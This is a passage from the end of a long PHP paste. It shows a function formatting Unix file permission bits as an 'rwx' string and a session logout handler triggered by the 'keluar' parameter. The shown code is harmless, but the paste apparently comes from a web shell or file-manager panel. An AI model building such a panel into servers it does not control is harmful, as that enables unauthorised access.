  1088. // Owner
  1089. $info .= (($perms & 0x0100) ? 'r' : '-');
  1090. $info .= (($perms & 0x0080) ? 'w' : '-');
  1091. $info .= (($perms & 0x0040) ?
  1092. (($perms & 0x0800) ? 's' : 'x' ) :
  1093. (($perms & 0x0800) ? 'S' : '-'));
  1094.  
  1095. // Group
  1096. $info .= (($perms & 0x0020) ? 'r' : '-');
  1097. $info .= (($perms & 0x0010) ? 'w' : '-');
  1098. $info .= (($perms & 0x0008) ?
  1099. (($perms & 0x0400) ? 's' : 'x' ) :
  1100. (($perms & 0x0400) ? 'S' : '-'));
  1101.  
  1102. // World
  1103. $info .= (($perms & 0x0004) ? 'r' : '-');
  1104. $info .= (($perms & 0x0002) ? 'w' : '-');
  1105. $info .= (($perms & 0x0001) ?
  1106. (($perms & 0x0200) ? 't' : 'x' ) :
  1107. (($perms & 0x0200) ? 'T' : '-'));
  1108.  
  1109. return $info;
  1110. }
  1111. ?>
  1112. <?php
  1113. if (isset($_GET['keluar'])){
  1114. session_start();
  1115. session_destroy();
  1116. echo '<script>window.location="?";</script>';
  1117. }
  1118. ?>
Add Comment
Please, Sign In to add comment